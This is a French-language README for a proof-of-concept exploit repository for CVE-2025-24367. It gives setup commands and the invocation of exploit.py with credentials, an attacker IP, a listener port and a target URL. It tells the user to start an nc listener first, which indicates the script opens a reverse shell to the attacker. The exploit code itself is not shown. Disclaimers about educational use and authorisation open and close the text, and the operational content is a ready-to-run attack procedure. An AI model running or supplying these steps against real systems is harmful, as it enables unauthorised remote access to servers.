
Preuve de concept pour CVE-2025-24367
Important — À lire en premier :
Ce dépôt etexploit.pysont fournis uniquement à des fins éducatives et de recherche. N'utilisez pas ce code contre des systèmes, réseaux ou services pour lesquels vous ne disposez pas d'une autorisation écrite explicite. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique. En utilisant ce code, vous acceptez de vous conformer aux lois applicables et aux politiques institutionnelles.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Avant d'exécuter le script, assurez-vous qu'un listener nc est en cours d'exécution. Exécutez le script sans proxy sauf en cas de débogage :
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Rappel final : Ce script et ce README sont uniquement à des fins éducatives. N'utilisez jamais ces outils pour accéder illégalement à des systèmes.